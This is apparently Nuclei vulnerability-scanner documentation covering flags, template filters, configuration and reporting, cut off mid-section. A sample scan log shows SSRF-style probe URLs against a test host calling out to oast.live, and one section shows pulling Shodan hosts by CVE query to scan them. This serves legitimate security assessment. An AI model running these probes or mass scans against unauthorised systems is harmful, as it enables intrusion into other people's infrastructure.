Nuclei can immensely improve how you approach security assessments by augmenting manual, repetitive processes. Consultancies are already converting their manual assessment steps to Nuclei, which allows them to run their custom assessment approach across thousands of hosts in an automated manner.
Pen-testers get the full power of public templates and customization capabilities to speed up their assessment process, particularly during the regression cycle, where you can easily verify a fix.
* Easily create a checklist for your compliance and standards suites (e.g. OWASP Top 10)
* Use capabilities like [DAST](https://docs.projectdiscovery.io/templates/protocols/http/fuzzing-overview) and [workflows](https://docs.projectdiscovery.io/templates/workflows/overview) to automate complex manual steps and repetitive assessments with Nuclei.
* Easily re-test vulnerability fixes by just re-running the template.
# Running Nuclei
Learn about how to run Nuclei and produce results
## How to Run Nuclei
Nuclei offers two primary ways to execute templates: individual templates (`-t`) and workflows (`-w`), both covered below.
### Supported Input Formats
Nuclei supports various input formats to run templates against, including URLs, hosts, IPs, CIDRs, ASNs, OpenAPI/Swagger definitions, Proxify and Burp Suite exported data, and more. To learn more about these input options, refer to [nuclei input formats](/tools/nuclei/input-formats).
These inputs can be passed to Nuclei using the `-l` and `-input-mode` flags.
```console
-l, -list string path to file containing a list of target URLs/hosts to scan (one per line)
-im, -input-mode string mode of input file (list, burp, jsonl, yaml, openapi, swagger) (default "list")
```
Executing Nuclei against a list of inputs (URLs, hosts, IPs, CIDRs, ASNs) is as simple as running the following command:
```bash
nuclei -l targets.txt
```
To run other input formats (burp, jsonl, yaml, openapi, swagger), use the `-im` flag to specify the input mode.
```bash
nuclei -l targets.burp -im burp
```
```bash
nuclei -l openapi.yaml -im openapi
```
and so on.
### Executing Nuclei Templates
`-t / -templates`
**Default Templates**
Most community templates from our [nuclei-templates repository](https://github.com/projectdiscovery/nuclei-templates) are executed by default, directly from the standard installation path. The typical command is as follows:
```sh
nuclei -u https://example.com
```
However, there are some exceptions regarding the templates that run by default:
* Certain tags and templates listed in the [default `.nuclei-ignore` file](https://github.com/projectdiscovery/nuclei-templates/blob/main/.nuclei-ignore) are not included.
* [Code Templates](/templates/protocols/code) require the `-code` flag to execute.
* [Headless Templates](/templates/protocols/headless) will not run unless you pass the `-headless` flag.
* [Fuzzing Templates](/templates/protocols/http/fuzzing-overview) will not run unless you pass the `-fuzz` flag (see the example after this list).
* A separate collection of [Fuzzing Templates](/templates/protocols/http/fuzzing-overview), located in a [different repository](https://github.com/projectdiscovery/fuzzing-templates), must be downloaded and configured separately for use.
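For example, assuming you want all of these opt-in template classes included in a single run, the flags can be combined. A sketch (the target is a placeholder):
```bash
# Opt in to code, headless, and fuzzing templates for this run
nuclei -u https://example.com -code -headless -fuzz
```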
You can also run templates against a list of URLs:
```sh
nuclei -list http_urls.txt
```
**Custom Templates**
To run a custom template directory or multiple directories, use the following command structure:
```sh
nuclei -u https://example.com -t cves/ -t exposures/
```
Templates from custom GitHub repositories, stored under the `github` directory, can be executed with this command:
```sh
nuclei -u https://example.com -t github/private-repo
```
You can also directly run a template from any ProjectDiscovery Cloud Platform URL like this:
```sh
nuclei -u https://example.com -t https://cloud.projectdiscovery.io/public/tech-detect
```
### Executing Template Workflows
`-w / -workflows`
[Workflows](/templates/workflows/overview) can be executed using the following command:
```sh
nuclei -u https://example.com -w workflows/
```
Similarly, Workflows can be executed against a list of URLs.
```sh
nuclei -list http_urls.txt -w workflows/wordpress-workflow.yaml
```
## Types of Templates
### Template **Filters**
The Nuclei engine supports three basic filters to customize template execution:
1. Tags (`-tags`)
Filter based on the tags field available in the template.
2. Severity (`-severity`)
Filter based on the severity field available in the template.
3. Author (`-author`)
Filter based on the author field available in the template.
By default, filters are applied to the installed template path; this can be customized by providing template paths manually.
For example, the command below will run all templates installed in the `~/nuclei-templates/` directory that have the `cve` tag:
```sh
nuclei -u https://example.com -tags cve
```
And this example will run all templates under the `~/nuclei-templates/exposures/` directory that have the `config` tag:
```sh
nuclei -u https://example.com -tags config -t exposures/
```
Multiple filters work together with an AND condition. The example below runs all templates that have the `cve` tag AND `critical` OR `high` severity AND `geeknik` as the template author:
```sh
nuclei -u https://example.com -tags cve -severity critical,high -author geeknik
```
### Advanced Filters
Multiple filters can also be combined using the template condition flag (`-tc`), which allows complex expressions like the following:
```sh
nuclei -tc "contains(id,'xss') || contains(tags,'xss')"
nuclei -tc "contains(tags,'cve') && contains(tags,'ssrf')"
nuclei -tc "contains(name, 'Local File Inclusion')"
```
The supported fields are:
* `id` string
* `name` string
* `description` string
* `tags` slice of strings
* `authors` slice of strings
* `severity` string
* `protocol` string
* `http_method` slice of strings
* `body` string (containing all request bodies if any)
* `matcher_type` slice of strings
* `extractor_type` slice of strings
Also, every key-value pair from the template metadata section is accessible. All fields can be combined with logical operators (`||` and `&&`) and used with DSL helper functions.
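For instance, the fields above can be mixed in a single condition with logical operators; a minimal sketch:
```bash
# Run only critical-severity templates whose tags mention 'rce'
nuclei -tc "severity == 'critical' && contains(tags,'rce')"
```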
Similarly, all filters are supported in workflows as well.
```sh
nuclei -w workflows/wordpress-workflow.yaml -severity critical,high -list http_urls.txt
```
**Workflows**
In workflows, Nuclei filters are applied to the templates or sub-templates running via the workflow, not to the workflow itself.
### Public Templates
Nuclei has built-in support for automatic template download/update from the [**nuclei-templates**](https://github.com/projectdiscovery/nuclei-templates) project, which provides a [community-contributed](https://github.com/projectdiscovery/nuclei-templates#-community) list of ready-to-use templates that is constantly updated.
Nuclei checks for new community template releases upon each execution and automatically downloads the latest version when available. Optionally, this feature can be disabled using the `-duc` CLI flag or the configuration file.
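For example, to skip the update check for a single run (a sketch; the target is a placeholder):
```bash
# -duc disables the automatic nuclei/templates update check
nuclei -u https://example.com -duc
```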
### Custom Templates
Users can host custom templates in a personal public or private GitHub or GitLab repository, AWS S3 bucket, or Azure Blob Storage container, and run or update them while using Nuclei from any environment, without manually downloading the repository everywhere.
To use this feature, users need to set the following environment variables:
```bash
export GITHUB_TOKEN=gh_XXX
export GITHUB_TEMPLATE_REPO=my_nuclei_template
```
```bash
export GITLAB_SERVER_URL=https://gitlab.com
# The GitLab token must have the read_api and read_repository scope
export GITLAB_TOKEN=XXXXXXXXXX
# Comma separated list of repository IDs (not names)
export GITLAB_REPOSITORY_IDS=12345,67890
```
```bash
export AWS_ACCESS_KEY=AKIAXXXXXXXX
export AWS_SECRET_KEY=XXXXXX
export AWS_REGION=us-xxx-1
export AWS_TEMPLATE_BUCKET=aws_bucket_name
```
```bash
export AZURE_TENANT_ID=00000000-0000-0000-0000-000000000000
export AZURE_CLIENT_ID=00000000-0000-0000-0000-000000000000
export AZURE_CLIENT_SECRET=00000000-0000-0000-0000-000000000000
export AZURE_SERVICE_URL=https://XXXXXXXXXX.blob.core.windows.net/
export AZURE_CONTAINER_NAME=templates
```
Environment variables can also be provided to disable download from default and custom template locations:
```bash
# Disable download from the default nuclei-templates project
export DISABLE_NUCLEI_TEMPLATES_PUBLIC_DOWNLOAD=true
# Disable download from public / private GitHub project(s)
export DISABLE_NUCLEI_TEMPLATES_GITHUB_DOWNLOAD=true
# Disable download from public / private GitLab project(s)
export DISABLE_NUCLEI_TEMPLATES_GITLAB_DOWNLOAD=true
# Disable download from public / private AWS Bucket(s)
export DISABLE_NUCLEI_TEMPLATES_AWS_DOWNLOAD=true
# Disable download from public / private Azure Blob Storage
export DISABLE_NUCLEI_TEMPLATES_AZURE_DOWNLOAD=true
```
Once the environment variables are set, use the following command to download the custom templates:
```bash
nuclei -update-templates
```
This command will clone the repository containing the custom templates to the default nuclei templates directory (`$HOME/nuclei-templates/github/`).
The directory structure of the custom templates looks as follows:
```bash
tree $HOME/nuclei-templates/
nuclei-templates/
└── github/$GH_REPO_NAME # Custom templates downloaded from public / private GitHub project
└── gitlab/$GL_REPO_NAME # Custom templates downloaded from public / private GitLab project
└── s3/$BUCKET_NAME # Custom templates downloaded from public / private AWS Bucket
└── azure/$CONTAINER_NAME # Custom templates downloaded from public / private Azure Blob Storage
```
Users can then use the custom templates with the `-t` flag as follows:
```
nuclei -t github/my_custom_template -u https://example.com
```
The nuclei engine can be updated to the latest version by using the `-update` flag.
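A quick sketch of both update operations:
```bash
# Update the nuclei engine to the latest release
nuclei -update
# Update the installed nuclei-templates
nuclei -update-templates
```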
Writing your own unique templates will always keep you one step ahead of
others.
### Nuclei Flags
```
nuclei -h
```
This will display help for the tool. Here are all the switches it supports.
```console
Nuclei is a fast, template based vulnerability scanner focusing
on extensive configurability, massive extensibility and ease of use.
Usage:
nuclei [flags]
Flags:
TARGET:
-u, -target string[] target URLs/hosts to scan
-l, -list string path to file containing a list of target URLs/hosts to scan (one per line)
-eh, -exclude-hosts string[] hosts to exclude to scan from the input list (ip, cidr, hostname)
-resume string resume scan using resume.cfg (clustering will be disabled)
-sa, -scan-all-ips scan all the IP's associated with dns record
-iv, -ip-version string[] IP version to scan of hostname (4,6) - (default 4)
TARGET-FORMAT:
-im, -input-mode string mode of input file (list, burp, jsonl, yaml, openapi, swagger) (default "list")
-ro, -required-only use only required fields in input format when generating requests
-sfv, -skip-format-validation skip format validation (like missing vars) when parsing input file
TEMPLATES:
-nt, -new-templates run only new templates added in latest nuclei-templates release
-ntv, -new-templates-version string[] run new templates added in specific version
-as, -automatic-scan automatic web scan using wappalyzer technology detection to tags mapping
-t, -templates string[] list of template or template directory to run (comma-separated, file)
-turl, -template-url string[] template url or list containing template urls to run (comma-separated, file)
-w, -workflows string[] list of workflow or workflow directory to run (comma-separated, file)
-wurl, -workflow-url string[] workflow url or list containing workflow urls to run (comma-separated, file)
-validate validate the passed templates to nuclei
-nss, -no-strict-syntax disable strict syntax check on templates
-td, -template-display displays the templates content
-tl list all available templates
-sign signs the templates with the private key defined in NUCLEI_SIGNATURE_PRIVATE_KEY env variable
-code enable loading code protocol-based templates
-dut, -disable-unsigned-templates disable running unsigned templates or templates with mismatched signature
FILTERING:
-a, -author string[] templates to run based on authors (comma-separated, file)
-tags string[] templates to run based on tags (comma-separated, file)
-etags, -exclude-tags string[] templates to exclude based on tags (comma-separated, file)
-itags, -include-tags string[] tags to be executed even if they are excluded either by default or configuration
-id, -template-id string[] templates to run based on template ids (comma-separated, file, allow-wildcard)
-eid, -exclude-id string[] templates to exclude based on template ids (comma-separated, file)
-it, -include-templates string[] path to template file or directory to be executed even if they are excluded either by default or configuration
-et, -exclude-templates string[] path to template file or directory to exclude (comma-separated, file)
-em, -exclude-matchers string[] template matchers to exclude in result
-s, -severity value[] templates to run based on severity. Possible values: info, low, medium, high, critical, unknown
-es, -exclude-severity value[] templates to exclude based on severity. Possible values: info, low, medium, high, critical, unknown
-pt, -type value[] templates to run based on protocol type. Possible values: dns, file, http, headless, tcp, workflow, ssl, websocket, whois, code, javascript
-ept, -exclude-type value[] templates to exclude based on protocol type. Possible values: dns, file, http, headless, tcp, workflow, ssl, websocket, whois, code, javascript
-tc, -template-condition string[] templates to run based on expression condition
OUTPUT:
-o, -output string output file to write found issues/vulnerabilities
-sresp, -store-resp store all request/response passed through nuclei to output directory
-srd, -store-resp-dir string store all request/response passed through nuclei to custom directory (default "output")
-silent display findings only
-nc, -no-color disable output content coloring (ANSI escape codes)
-j, -jsonl write output in JSONL(ines) format
-irr, -include-rr -omit-raw include request/response pairs in the JSON, JSONL, and Markdown outputs (for findings only) [DEPRECATED use -omit-raw] (default true)
-or, -omit-raw omit request/response pairs in the JSON, JSONL, and Markdown outputs (for findings only)
-ot, -omit-template omit encoded template in the JSON, JSONL output
-nm, -no-meta disable printing result metadata in cli output
-ts, -timestamp enables printing timestamp in cli output
-rdb, -report-db string nuclei reporting database (always use this to persist report data)
-ms, -matcher-status display match failure status
-me, -markdown-export string directory to export results in markdown format
-se, -sarif-export string file to export results in SARIF format
-je, -json-export string file to export results in JSON format
-jle, -jsonl-export string file to export results in JSONL(ine) format
CONFIGURATIONS:
-config string path to the nuclei configuration file
-fr, -follow-redirects enable following redirects for http templates
-fhr, -follow-host-redirects follow redirects on the same host
-mr, -max-redirects int max number of redirects to follow for http templates (default 10)
-dr, -disable-redirects disable redirects for http templates
-rc, -report-config string nuclei reporting module configuration file
-H, -header string[] custom header/cookie to include in all http request in header:value format (cli, file)
-V, -var value custom vars in key=value format
-r, -resolvers string file containing resolver list for nuclei
-sr, -system-resolvers use system DNS resolving as error fallback
-dc, -disable-clustering disable clustering of requests
-passive enable passive HTTP response processing mode
-fh2, -force-http2 force http2 connection on requests
-ev, -env-vars enable environment variables to be used in template
-cc, -client-cert string client certificate file (PEM-encoded) used for authenticating against scanned hosts
-ck, -client-key string client key file (PEM-encoded) used for authenticating against scanned hosts
-ca, -client-ca string client certificate authority file (PEM-encoded) used for authenticating against scanned hosts
-sml, -show-match-line show match lines for file templates, works with extractors only
-ztls use ztls library with autofallback to standard one for tls13 [Deprecated] autofallback to ztls is enabled by default
-sni string tls sni hostname to use (default: input domain name)
-dt, -dialer-timeout value timeout for network requests.
-dka, -dialer-keep-alive value keep-alive duration for network requests.
-lfa, -allow-local-file-access allows file (payload) access anywhere on the system
-lna, -restrict-local-network-access blocks connections to the local / private network
-i, -interface string network interface to use for network scan
-at, -attack-type string type of payload combinations to perform (batteringram,pitchfork,clusterbomb)
-sip, -source-ip string source ip address to use for network scan
-rsr, -response-size-read int max response size to read in bytes (default 10485760)
-rss, -response-size-save int max response size to save in bytes (default 1048576)
-reset reset removes all nuclei configuration and data files (including nuclei-templates)
-tlsi, -tls-impersonate enable experimental client hello (ja3) tls randomization
INTERACTSH:
-iserver, -interactsh-server string interactsh server url for self-hosted instance (default: oast.pro,oast.live,oast.site,oast.online,oast.fun,oast.me)
-itoken, -interactsh-token string authentication token for self-hosted interactsh server
-interactions-cache-size int number of requests to keep in the interactions cache (default 5000)
-interactions-eviction int number of seconds to wait before evicting requests from cache (default 60)
-interactions-poll-duration int number of seconds to wait before each interaction poll request (default 5)
-interactions-cooldown-period int extra time for interaction polling before exiting (default 5)
-ni, -no-interactsh disable interactsh server for OAST testing, exclude OAST based templates
FUZZING:
-ft, -fuzzing-type string overrides fuzzing type set in template (replace, prefix, postfix, infix)
-fm, -fuzzing-mode string overrides fuzzing mode set in template (multiple, single)
-fuzz enable loading fuzzing templates
UNCOVER:
-uc, -uncover enable uncover engine
-uq, -uncover-query string[] uncover search query
-ue, -uncover-engine string[] uncover search engine (shodan,censys,fofa,shodan-idb,quake,hunter,zoomeye,netlas,criminalip,publicwww,hunterhow) (default shodan)
-uf, -uncover-field string uncover fields to return (ip,port,host) (default "ip:port")
-ul, -uncover-limit int uncover results to return (default 100)
-ur, -uncover-ratelimit int override ratelimit of engines with unknown ratelimit (default 60 req/min) (default 60)
RATE-LIMIT:
-rl, -rate-limit int maximum number of requests to send per second (default 150)
-rlm, -rate-limit-minute int maximum number of requests to send per minute
-bs, -bulk-size int maximum number of hosts to be analyzed in parallel per template (default 25)
-c, -concurrency int maximum number of templates to be executed in parallel (default 25)
-hbs, -headless-bulk-size int maximum number of headless hosts to be analyzed in parallel per template (default 10)
-headc, -headless-concurrency int maximum number of headless templates to be executed in parallel (default 10)
-jsc, -js-concurrency int maximum number of javascript runtimes to be executed in parallel (default 120)
-pc, -payload-concurrency int max payload concurrency for each template (default 25)
OPTIMIZATIONS:
-timeout int time to wait in seconds before timeout (default 10)
-retries int number of times to retry a failed request (default 1)
-ldp, -leave-default-ports leave default HTTP/HTTPS ports (eg. host:80,host:443)
-mhe, -max-host-error int max errors for a host before skipping from scan (default 30)
-te, -track-error string[] adds given error to max-host-error watchlist (standard, file)
-nmhe, -no-mhe disable skipping host from scan based on errors
-project use a project folder to avoid sending same request multiple times
-project-path string set a specific project path
-spm, -stop-at-first-match stop processing HTTP requests after the first match (may break template/workflow logic)
-stream stream mode - start elaborating without sorting the input
-ss, -scan-strategy value strategy to use while scanning(auto/host-spray/template-spray) (default auto)
-irt, -input-read-timeout value timeout on input read (default 3m0s)
-nh, -no-httpx disable httpx probing for non-url input
-no-stdin disable stdin processing
HEADLESS:
-headless enable templates that require headless browser support (root user on Linux will disable sandbox)
-page-timeout int seconds to wait for each page in headless mode (default 20)
-sb, -show-browser show the browser on the screen when running templates with headless mode
-ho, -headless-options string[] start headless chrome with additional options
-sc, -system-chrome use local installed Chrome browser instead of nuclei installed
-lha, -list-headless-action list available headless actions
DEBUG:
-debug show all requests and responses
-dreq, -debug-req show all sent requests
-dresp, -debug-resp show all received responses
-p, -proxy string[] list of http/socks5 proxy to use (comma separated or file input)
-pi, -proxy-internal proxy all internal requests
-ldf, -list-dsl-function list all supported DSL function signatures
-tlog, -trace-log string file to write sent requests trace log
-elog, -error-log string file to write sent requests error log
-version show nuclei version
-hm, -hang-monitor enable nuclei hang monitoring
-v, -verbose show verbose output
-profile-mem string optional nuclei memory profile dump file
-vv display templates loaded for scan
-svd, -show-var-dump show variables dump for debugging
-ep, -enable-pprof enable pprof debugging server
-tv, -templates-version shows the version of the installed nuclei-templates
-hc, -health-check run diagnostic check up
UPDATE:
-up, -update update nuclei engine to the latest released version
-ut, -update-templates update nuclei-templates to latest released version
-ud, -update-template-dir string custom directory to install / update nuclei-templates
-duc, -disable-update-check disable automatic nuclei/templates update check
STATISTICS:
-stats display statistics about the running scan
-sj, -stats-json display statistics in JSONL(ines) format
-si, -stats-interval int number of seconds to wait between showing a statistics update (default 5)
-mp, -metrics-port int port to expose nuclei metrics on (default 9092)
CLOUD:
-auth configure projectdiscovery cloud (pdcp) api key (default true)
-cup, -cloud-upload upload scan results to pdcp dashboard
-sid, -scan-id string upload scan results to given scan id
AUTHENTICATION:
-sf, -secret-file string[] path to config file containing secrets for nuclei authenticated scan
-ps, -prefetch-secrets prefetch secrets from the secrets file
```
From Nuclei v3.0.0, the `-metrics` flag has been removed and merged with `-stats`. When the `-stats` flag is used, metrics are available by default at `localhost:9092/metrics`, and the port can be configured with the `-metrics-port` flag.
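For example, a sketch exposing metrics on a custom port (`urls.txt` is a placeholder input list):
```bash
# Metrics served at localhost:9093/metrics while the scan runs
nuclei -l urls.txt -t cves/ -stats -metrics-port 9093
```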
### Rate **Limits**
Nuclei has multiple rate limit controls covering several factors, including the number of templates to execute in parallel, the number of hosts to scan in parallel per template, and the global number of requests per second Nuclei is allowed to make. Here is each flag with a description.
| Flag | Description |
| ---------- | -------------------------------------------------------------------- |
| rate-limit | Control the total number of requests to send per second |
| bulk-size | Control the number of hosts to process in parallel for each template |
| c | Control the number of templates to process in parallel |
Feel free to play with these flags to tune your Nuclei scan speed and accuracy. For more details on tuning these flags, refer to [mass-scanning-cli](/tools/nuclei/mass-scanning-cli).
The `rate-limit` flag takes precedence over the other two flags: the number of requests per second can't exceed the value defined by the `rate-limit` flag, regardless of the values of the `c` and `bulk-size` flags.
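As a sketch, a deliberately conservative scan might combine all three (the values are illustrative, not recommendations):
```bash
# Cap at 50 req/s overall, 10 hosts per template, 10 templates in parallel
nuclei -l urls.txt -t cves/ -rate-limit 50 -bulk-size 10 -c 10
```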
### Traffic **Tagging**
Many bug bounty platforms/programs require you to identify the HTTP traffic you generate. This can be achieved by setting a custom header, either in the config file at `$HOME/.config/nuclei/config.yaml` or with the `-H / -header` CLI flag.
Setting a custom header using the config file:
```yaml
# Headers to include with each request.
header:
- 'X-BugBounty-Hacker: h1/geekboy'
- 'User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) / nuclei'
```
Setting a custom header using the CLI flag:
```bash
nuclei -header 'User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) / nuclei' -list urls.txt -tags cves
```
### Template **Exclusion**
Nuclei supports a variety of methods for excluding or blocking templates from execution. By default, **nuclei** excludes the tags and templates listed below from execution to avoid unexpected fuzz-based scans and templates that are not meant for mass scanning; these defaults can be easily overridden with the Nuclei configuration file or flags.
The Nuclei engine supports two ways to manually exclude templates from a scan:
1. Exclude Templates (`-et / -exclude-templates`)
The **exclude-templates** flag is used to exclude one or more templates or directories; multiple `-exclude-templates` flags can be used to provide multiple values.
2. Exclude Tags (`-etags / -exclude-tags`)
The **exclude-tags** flag is used to exclude templates based on their tags; one or more tags can be given.
Example of excluding a single template
```
nuclei -list urls.txt -t cves/ -exclude-templates cves/2020/CVE-2020-XXXX.yaml
```
Example of multiple template exclusion
```
nuclei -list urls.txt -exclude-templates exposed-panels/ -exclude-templates technologies/
```
Example of excluding templates with a single tag
```
nuclei -l urls.txt -t cves/ -etags xss
```
Example of excluding templates with multiple tags
```
nuclei -l urls.txt -t cves/ -etags sqli,rce
```
* [.nuclei-ignore](https://github.com/projectdiscovery/nuclei-templates/blob/main/.nuclei-ignore) list - the default list of tags and templates excluded from Nuclei scans.
The **.nuclei-ignore** file is not meant to be modified by the user, as it is used by Nuclei internally; to override the ignore list, use the [nuclei
configuration](/tools/nuclei/running#nuclei-config) file.
To prioritize certain templates or tags over the [.nuclei-ignore](https://github.com/projectdiscovery/nuclei-templates/blob/master/.nuclei-ignore) file or denylist, you must use the `-include-templates` or `-include-tags` flags. This will ensure that the specified templates or tags take precedence over any `.nuclei-ignore` or denylist entries.
Example of running blocked templates
```bash
nuclei -l urls.txt -include-tags iot,misc,fuzz
```
Example of executing a specific template that is in the denylist
Suppose you have custom templates globbed (`*`) in the denylist in your Nuclei configuration file.
```yaml
# ...
exclude-templates:
- 'custom/**/*.yaml'
```
But you just want to execute a specific template.
```bash
nuclei -l urls.txt -include-templates custom/specific-template.yaml
```
### List Template Path
The `-tl` option in Nuclei lists the paths of templates rather than executing them. This can help you inspect which templates would be used for a scan, given your current template filters.
```sh
# Command to list templates (-tl)
nuclei -tags cve -severity critical,high -author geeknik -tl
```
### Scan on Internet Databases
Nuclei integrates with the [uncover module](https://github.com/projectdiscovery/uncover), which supports services like Shodan, Censys, Hunter, ZoomEye, and many more, to execute Nuclei against hosts from these databases.
Here are the uncover options:
```console
nuclei -h uncover
UNCOVER:
-uc, -uncover enable uncover engine
-uq, -uncover-query string[] uncover search query
-ue, -uncover-engine string[] uncover search engine (shodan,shodan-idb,fofa,censys,quake,hunter,zoomeye,netlas,criminalip) (default shodan)
-uf, -uncover-field string uncover fields to return (ip,port,host) (default "ip:port")
-ul, -uncover-limit int uncover results to return (default 100)
-ucd, -uncover-delay int delay between uncover query requests in seconds (0 to disable) (default 1)
```
You need to set the API key of the engine you are using as an environment variable in your shell.
```
export SHODAN_API_KEY=xxx
export CENSYS_API_ID=xxx
export CENSYS_API_SECRET=xxx
export FOFA_EMAIL=xxx
export FOFA_KEY=xxx
export QUAKE_TOKEN=xxx
export HUNTER_API_KEY=xxx
export ZOOMEYE_API_KEY=xxx
```
The required API keys can be obtained by signing up on the following platforms: [Shodan](https://account.shodan.io/register), [Censys](https://censys.io/register), [Fofa](https://fofa.info/toLogin), [Quake](https://quake.360.net/quake/#/index), [Hunter](https://user.skyeye.qianxin.com/user/register?next=https%3A//hunter.qianxin.com/api/uLogin\&fromLogin=1) and [ZoomEye](https://www.zoomeye.org/login).
Example of template execution using a search query.
```
export SHODAN_API_KEY=xxx
nuclei -id 'CVE-2021-26855' -uq 'vuln:CVE-2021-26855' -ue shodan
```
Nuclei can also read queries from template metadata and execute templates against hosts returned by uncover for those queries.
Example of template execution using template-defined search queries.
Template snippet from [CVE-2021-26855](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-26855.yaml):
```yaml
metadata:
shodan-query: 'vuln:CVE-2021-26855'
```
```console
nuclei -t cves/2021/CVE-2021-26855.yaml -uncover
nuclei -tags cve -uncover
```
We can also update the Nuclei configuration file to include these flags and tags for all scans.
## Nuclei **Config**
> Since the release of [v2.3.2](https://blog.projectdiscovery.io/nuclei-v2-3-0-release/), nuclei uses [goflags](https://github.com/projectdiscovery/goflags) for a clean CLI experience and long/short formatted flags.
>
> [goflags](https://github.com/projectdiscovery/goflags) comes with auto-generated config file support that converts all available CLI flags into a config file. Essentially, you can define any CLI flag in the config file to avoid repeating it; config entries load as defaults for every Nuclei scan.
>
> The default path of the nuclei config file is `$HOME/.config/nuclei/config.yaml`; uncomment and configure the flags you wish to run as defaults.
Here is an example config file:
```yaml
# Headers to include with all HTTP requests
header:
- 'X-BugBounty-Hacker: h1/geekboy'
# Directory based template execution
templates:
- cves/
- vulnerabilities/
- misconfiguration/
# Tags based template execution
tags: exposures,cve
# Template Filters
author: geeknik,pikpikcu,dhiyaneshdk
severity: critical,high,medium
# Template Allowlist
#
# Note: This will take precedence over the .nuclei-ignore file and denylist
# entries (exclude-tags or exclude-templates list).
include-tags: dos,fuzz # Tag based inclusion
include-templates: # Template based inclusion
- vulnerabilities/xxx
- misconfiguration/xxxx
# Template Denylist
exclude-tags: info # Tag based exclusion
exclude-templates: # Template based exclusion
- vulnerabilities/xxx
- misconfiguration/xxxx
# Rate Limit configuration
rate-limit: 500
bulk-size: 50
concurrency: 50
```
Once configured, **the config file is used by default**. Additionally, a custom config file can be provided using the `-config` flag.
**Running nuclei with a custom config file**
```
nuclei -config project.yaml -list urls.txt
```
## Nuclei Result Dashboard
Nuclei now integrates seamlessly with the ProjectDiscovery Cloud Platform to simplify the visualization of Nuclei results and generate reports quickly. This highly requested community feature enables easier handling of scan results with minimal effort.
Follow the steps below to set up your PDCP Result Dashboard:
1. Visit [https://cloud.projectdiscovery.io](https://cloud.projectdiscovery.io) to create a free PDCP API key.
2. Run the `nuclei -auth` command and enter your API key when prompted.
3. To perform a scan and upload the results straight to the cloud, use the `-cloud-upload` option when running a nuclei scan.
An example command might look like this:
```bash
nuclei -target http://honey.scanme.sh -cloud-upload
```
And the output would be like this:
```console
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.1.0
projectdiscovery.io
[INF] Current nuclei version: v3.1.0 (latest)
[INF] Current nuclei-templates version: v9.6.9 (latest)
[INF] To view results on cloud dashboard, visit https://cloud.projectdiscovery.io/scans upon scan completion.
[INF] New templates added in latest release: 73
[INF] Templates loaded for current scan: 71
[INF] Executing 71 signed templates from projectdiscovery/nuclei-templates
[INF] Targets loaded for current scan: 1
[INF] Using Interactsh Server: oast.live
[CVE-2017-9506] [http] [medium] http://honey.scanme.sh/plugins/servlet/oauth/users/icon-uri?consumerUri=http://clk37fcdiuf176s376hgjzo3xsoq5bdad.oast.live
[CVE-2019-9978] [http] [medium] http://honey.scanme.sh/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://clk37fcdiuf176s376hgyk9ppdqe9a83z.oast.live
[CVE-2019-8451] [http] [medium] http://honey.scanme.sh/plugins/servlet/gadgets/makeRequest
[CVE-2015-8813] [http] [high] http://honey.scanme.sh/Umbraco/feedproxy.aspx?url=http://clk37fcdiuf176s376hgj885caqoc713k.oast.live
[CVE-2020-24148] [http] [critical] http://honey.scanme.sh/wp-admin/admin-ajax.php?action=moove_read_xml
[CVE-2020-5775] [http] [medium] http://honey.scanme.sh/external_content/retrieve/oembed?endpoint=http://clk37fcdiuf176s376hgyyxa48ih7jep5.oast.live&url=foo
[CVE-2020-7796] [http] [critical] http://honey.scanme.sh/zimlet/com_zimbra_webex/httpPost.jsp?companyId=http://clk37fcdiuf176s376hgi9b8sd33se5sr.oast.live%23
[CVE-2017-18638] [http] [high] http://honey.scanme.sh/composer/send_email?to=hVsp@XOvw&url=http://clk37fcdiuf176s376hgyf8y81i9oju3e.oast.live
[CVE-2018-15517] [http] [high] http://honey.scanme.sh/index.php/System/MailConnect/host/clk37fcdiuf176s376hgi5j3fsht3dchj.oast.live/port/80/secure/
[CVE-2021-45967] [http] [critical] http://honey.scanme.sh/services/pluginscript/..;/..;/..;/getFavicon?host=clk37fcdiuf176s376hgh1y3xjzb3yjpy.oast.live
[CVE-2021-26855] [http] [critical] http://honey.scanme.sh/owa/auth/x.js
[INF] Scan results uploaded! View them at https://cloud.projectdiscovery.io/scans/clk37krsr14s73afc3ag
```
After the scan, a URL will be displayed on the command line interface. Visit this URL to check your results on the Cloud Dashboard.
### Advanced Integration Options
**Setting API key via environment variable**
Avoid entering your API key at the interactive prompt by setting it as an environment variable.
```sh
export PDCP_API_KEY=XXXX-XXXX
```
**Enabling result upload by default**
If you want all your scans to automatically upload results to the cloud, set the `ENABLE_CLOUD_UPLOAD` environment variable to true.
```sh
export ENABLE_CLOUD_UPLOAD=true
```
**Disabling cloud upload warnings**
To suppress warnings about result uploads, set the `DISABLE_CLOUD_UPLOAD_WRN` environment variable to true.
```sh
export DISABLE_CLOUD_UPLOAD_WRN=true
```
Your configured PDCP API key is stored in `$HOME/.pdcp/credentials.yaml`.
Nuclei OSS results uploaded to the cloud platform are scheduled for automatic cleanup after 30 days, although this duration is subject to change as we gauge user feedback and requirements.
## Nuclei Reporting
Nuclei has included reporting module support since the release of v2.3.0, with GitHub, GitLab, and Jira integrations. This allows the nuclei engine to automatically create tickets on a supported platform based on found results.
| Platform | GitHub | GitLab | Jira | Markdown | SARIF | Elasticsearch | Splunk HEC | MongoDB |
| -------- | :----: | :----: | :--: | :------: | :---: | :-----------: | :--------: | :-----: |
| Support | ✔ | ✔ | ✔ | ✔ | ✔ | ✔ | ✔ | ✔ |
The `-rc, -report-config` flag can be used to provide a config file with the configuration details of the platform to integrate. Here is an [example config file](https://github.com/projectdiscovery/nuclei/blob/main/cmd/nuclei/issue-tracker-config.yaml) for all supported platforms.
For example, to create tickets on GitHub, create a config file with the following content and replace the appropriate values:
```yaml
# GitHub contains configuration options for GitHub issue tracker
github:
username: '$user'
owner: '$user'
token: '$token'
project-name: 'testing-project'
issue-label: 'Nuclei'
duplicate-issue-check: true
```
Alternatively, if you use GitLab, create a config file with the following content and replace the appropriate values:
```yaml
# GitLab contains configuration options for GitLab issue tracker
gitlab:
username: '$user'
base-url: 'gitlab.com'
token: '$token'
project-name: 'testing-project'
issue-label: 'nuclei-label'
severity-as-label: true
duplicate-issue-check: true
```
To store results in Elasticsearch, create a config file with the following content and replace the appropriate values:
